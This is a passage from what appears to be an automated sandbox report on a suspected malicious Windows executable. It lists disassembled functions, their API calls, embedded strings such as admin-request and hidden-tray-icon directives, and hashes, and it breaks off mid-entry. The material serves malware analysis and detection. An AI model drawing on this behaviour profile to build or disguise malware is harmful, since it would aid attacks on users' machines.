                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\0XLuA614VK.exe
                                                      • API String ID: 2506810119-3877578700
                                                      • Opcode ID: d6a48543c14dac173110df1f9066290c5985cdee8ece6d45adbf2132228e045e
                                                      • Instruction ID: 3acfc6809e5d5a06a81c76d12cf64c3a6108b2b6a2eb41b2daf9c38bdbce3360
                                                      • Opcode Fuzzy Hash: d6a48543c14dac173110df1f9066290c5985cdee8ece6d45adbf2132228e045e
                                                      • Instruction Fuzzy Hash: A7318375E00218EBDB21DB999C81E9EBBBCFF85312B144166FE0497211D6705E48EB90
                                                      Function 00F8C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F8C306
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00F8C34C
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FF1990,012055A8), ref: 00F8C395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem
                                                      • String ID: 0
                                                      • API String ID: 135850232-4108050209
                                                      • Opcode ID: 5cd070b2388465bda70747879e1bac90d7bacc0d6802d51126f81fb60310ccc9
                                                      • Instruction ID: c0c960f5ed6410c2ebb27634a632ccd80456b2dbf3b2ec5df98be91b6a877133
                                                      • Opcode Fuzzy Hash: 5cd070b2388465bda70747879e1bac90d7bacc0d6802d51126f81fb60310ccc9
                                                      • Instruction Fuzzy Hash: 1C41A3316043019FD720EF25DC84B9ABBE8EF85320F14862DF9A5972D1D774E905EBA2
                                                      Function 00FB4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FBCC08,00000000,?,?,?,?), ref: 00FB44AA
                                                      • GetWindowLongW.USER32 ref: 00FB44C7
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FB44D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 15cfc3bef67ab9110431c64e1f243317e1ba7781361a752b6e19cd845a71f562
                                                      • Instruction ID: 35943266359bd376d457efbd25a314707ab207b6de76de1732ccc5553d046388
                                                      • Opcode Fuzzy Hash: 15cfc3bef67ab9110431c64e1f243317e1ba7781361a752b6e19cd845a71f562
                                                      • Instruction Fuzzy Hash: BB31CD31610605AFDB209E39DC45BEA7BA9EB08334F244315F979921E1D774EC60AB60
                                                      Function 00FA304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FA335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00FA3077,?,?), ref: 00FA3378
                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FA307A
                                                      • _wcslen.LIBCMT ref: 00FA309B
                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00FA3106
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 946324512-2422070025
                                                      • Opcode ID: 40321586aba28bb319b6ba0ff09c95a8b9b2ca9a0ef51ef0a65bd4677d0482cf
                                                      • Instruction ID: f779034a862e504fdd3a191d71aa5cdae3e9133c27a0d29d1bb9d050efca31ec
                                                      • Opcode Fuzzy Hash: 40321586aba28bb319b6ba0ff09c95a8b9b2ca9a0ef51ef0a65bd4677d0482cf
                                                      • Instruction Fuzzy Hash: 1231E7B5A042059FCB10CF68C885EAA77E0EF16328F24C059F8158B392DB75EE41EB60
                                                      Function 00FB4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FB4705
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FB4713
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FB471A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: c552752a9b00b73abc246afd880e0eaf2573d0f3ec65eea4df4399183167949a
                                                      • Instruction ID: 97271e42ae707545c2064af4a4f61e9b8d3046b1ac93d57e201f8af642882c30
                                                      • Opcode Fuzzy Hash: c552752a9b00b73abc246afd880e0eaf2573d0f3ec65eea4df4399183167949a
                                                      • Instruction Fuzzy Hash: C9211BB5600209AFEB10DF65DC81DB737ADEB5A3A4B140159FA049B251CB75FC11EEA0
                                                      Function 00F895AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 176396367-2734436370
                                                      • Opcode ID: 12daf492f6001704fcad816b1efe2d25ff5ee68ad4ab4f2ef7372b97cc06b672
                                                      • Instruction ID: 0e5635c72140238218abd99fed8bb2e6cbb24d6ded777222f0e2ba83bface8be
                                                      • Opcode Fuzzy Hash: 12daf492f6001704fcad816b1efe2d25ff5ee68ad4ab4f2ef7372b97cc06b672
                                                      • Instruction Fuzzy Hash: 40213532608621A6C331BA25DC02FFB77D89F91320F1C4026F9499B181FBD9AD46F395
                                                      Function 00FB37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FB3840
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FB3850
                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FB3876
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 4cfb3a033e8204cc54957b8e0f11900b39ea1ca567814582706b290cf77fa527
                                                      • Instruction ID: b0ad2a86c373c6ae5f94fd2ed1abbc7c3a9ec3a2a2f138fa0f1cd59739dad6a0
                                                      • Opcode Fuzzy Hash: 4cfb3a033e8204cc54957b8e0f11900b39ea1ca567814582706b290cf77fa527
                                                      • Instruction Fuzzy Hash: 8421D072A40218BBEB219F56CC84FFB376EEF89760F108114F9009B190CA71DC12ABE0
                                                      Function 00F949F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F94A08
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F94A5C
                                                      • SetErrorMode.KERNEL32(00000000,?,?,00FBCC08), ref: 00F94AD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: %lu
                                                      • API String ID: 2507767853-685833217
                                                      • Opcode ID: 740a7ba02e1aecdc5c03cbeeb1f5ae157a932b0992814aac4fbd59afa7eb5aad
                                                      • Instruction ID: 71f8ef3c94426e633365518f1ff9a55834aa32575db7e8ccfeb307cb3ebd3646
                                                      • Opcode Fuzzy Hash: 740a7ba02e1aecdc5c03cbeeb1f5ae157a932b0992814aac4fbd59afa7eb5aad
                                                      • Instruction Fuzzy Hash: B1317171A00109AFDB10DF54C885EAABBF8EF48318F1480A5F909EB252D775ED46DBA1
                                                      Function 00FB41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FB424F
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FB4264
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FB4271
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 98e9e1a687c6006f2e683c0d7ae705ded63f02c77f53593f0ac29859da95814b
                                                      • Instruction ID: 4949602afcb84ee9a9a26b25ac2af4ba637dbc4bcda2f755af94a881cd43eced
                                                      • Opcode Fuzzy Hash: 98e9e1a687c6006f2e683c0d7ae705ded63f02c77f53593f0ac29859da95814b
                                                      • Instruction Fuzzy Hash: D011E331640248BEEF209E2ACC06FEB3BACEF95B64F010114FA55E20A1D271EC11FB50
                                                      Function 00F82F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                        • Part of subcall function 00F82DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F82DC5
                                                        • Part of subcall function 00F82DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F82DD6
                                                        • Part of subcall function 00F82DA7: GetCurrentThreadId.KERNEL32 ref: 00F82DDD
                                                        • Part of subcall function 00F82DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F82DE4
                                                      • GetFocus.USER32 ref: 00F82F78
                                                        • Part of subcall function 00F82DEE: GetParent.USER32(00000000), ref: 00F82DF9
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00F82FC3
                                                      • EnumChildWindows.USER32(?,00F8303B), ref: 00F82FEB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                      • String ID: %s%d
                                                      • API String ID: 1272988791-1110647743
                                                      • Opcode ID: 2d47457495f1445f25eb7ebaba668179780e44ac8fac2688904593ba1f7f4b1d
                                                      • Instruction ID: 2da5199a4f39214159769a933479f76e2a015ad0af88d1c81afceaf16e5b747f
                                                      • Opcode Fuzzy Hash: 2d47457495f1445f25eb7ebaba668179780e44ac8fac2688904593ba1f7f4b1d
                                                      • Instruction Fuzzy Hash: 1E1103726002096BCF507F709CC6EEE3B6AAF84308F044075FD09DB292DE349909AB70
                                                      Function 00FB5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FB58C1
                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FB58EE
                                                      • DrawMenuBar.USER32(?), ref: 00FB58FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Menu$InfoItem$Draw
                                                      • String ID: 0
                                                      • API String ID: 3227129158-4108050209
                                                      • Opcode ID: 876035665f6c1728aff4f227d1b46c54f4de65fd194ca9face374acb03084ab9
                                                      • Instruction ID: c85b081b33abc79c9b942cfcc93583607a79f5f3ee367fa80f76552f6cd90314
                                                      • Opcode Fuzzy Hash: 876035665f6c1728aff4f227d1b46c54f4de65fd194ca9face374acb03084ab9
                                                      • Instruction Fuzzy Hash: D5012D32900218EFDB219F12DC44BEFBBB4FB45761F1480AAE849D6151DB348A98FF61
                                                      Function 00F7D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F7D3BF
                                                      • FreeLibrary.KERNEL32 ref: 00F7D3E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                      • API String ID: 3013587201-2590602151
                                                      • Opcode ID: 0023f766e1770a11552e85e7351c16111b8110e26aca1ffbc20bf16d80d72c99
                                                      • Instruction ID: 59384c6db9de59c0e80402c6fd4611981b00f265c94482008312477aefb697f6
                                                      • Opcode Fuzzy Hash: 0023f766e1770a11552e85e7351c16111b8110e26aca1ffbc20bf16d80d72c99
                                                      • Instruction Fuzzy Hash: C8F05562C026258BD3B512118C94BAA3334AF00B15FDAC217F80EF2047EB60CC42FAD3
                                                      Function 00F8007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e66758f2d4b5770836a214312bc36653604be74120a6acab9432e6ad9c57c793
                                                      • Instruction ID: 61c0f688673097a5b15de6bc862f2db0bc1dd209a21adb8d79aa91e13dd13dfd
                                                      • Opcode Fuzzy Hash: e66758f2d4b5770836a214312bc36653604be74120a6acab9432e6ad9c57c793
                                                      • Instruction Fuzzy Hash: C1C17C75A0020AEFDB54DFA4C888BAEB7B5FF48314F508598E405EB251CB71EE45EB90
                                                      Function 00FA342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                      • String ID:
                                                      • API String ID: 1998397398-0
                                                      • Opcode ID: 044d056df400465abe5df9c46632205ae564ee8af512ef12691f382024bb0aaf
                                                      • Instruction ID: ab146a90ef010882046f86ae52cfe145086608ddc9f54b8ac239e45b0e17b945
                                                      • Opcode Fuzzy Hash: 044d056df400465abe5df9c46632205ae564ee8af512ef12691f382024bb0aaf
                                                      • Instruction Fuzzy Hash: A6A150B56043109FC700EF28C985E1AB7E5FF89724F088859F9899B361DB34ED01EB91
                                                      Function 00F80436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FBFC08,?), ref: 00F805F0
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FBFC08,?), ref: 00F80608
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00FBCC40,000000FF,?,00000000,00000800,00000000,?,00FBFC08,?), ref: 00F8062D
                                                      • _memcmp.LIBVCRUNTIME ref: 00F8064E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: cbe57b77aaa59d50b18c417ed032d5bde607f12e12a01ab954a188843bcc90fd
                                                      • Instruction ID: 0733798ed4e0ee34869b438ec8569ed704af9715824051480f0399dd8fd4b321
                                                      • Opcode Fuzzy Hash: cbe57b77aaa59d50b18c417ed032d5bde607f12e12a01ab954a188843bcc90fd
                                                      • Instruction Fuzzy Hash: 64812971A00109EFCB44DF94C988EEEB7B9FF89315F244558E506AB250DB71AE0ADF60
                                                      Function 00F61391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 01f6e71a8165e9fbe9aadbc06bebd6c2a1acde1a74fac66ed536cedf6bf2950b
                                                      • Instruction ID: 5bd6e9a0985ae637c7e733ba45f818244450172fb9e6cce891be4e3b62978fc2
                                                      • Opcode Fuzzy Hash: 01f6e71a8165e9fbe9aadbc06bebd6c2a1acde1a74fac66ed536cedf6bf2950b
                                                      • Instruction Fuzzy Hash: 9D411931E00110ABDB25EBB98C467BE3AA4FF43370F1C4225F919D7292EA788D457761
                                                      Function 00FB6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(0120E990,?), ref: 00FB62E2
                                                      • ScreenToClient.USER32(?,?), ref: 00FB6315
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00FB6382
                                                      Memory Dump Source
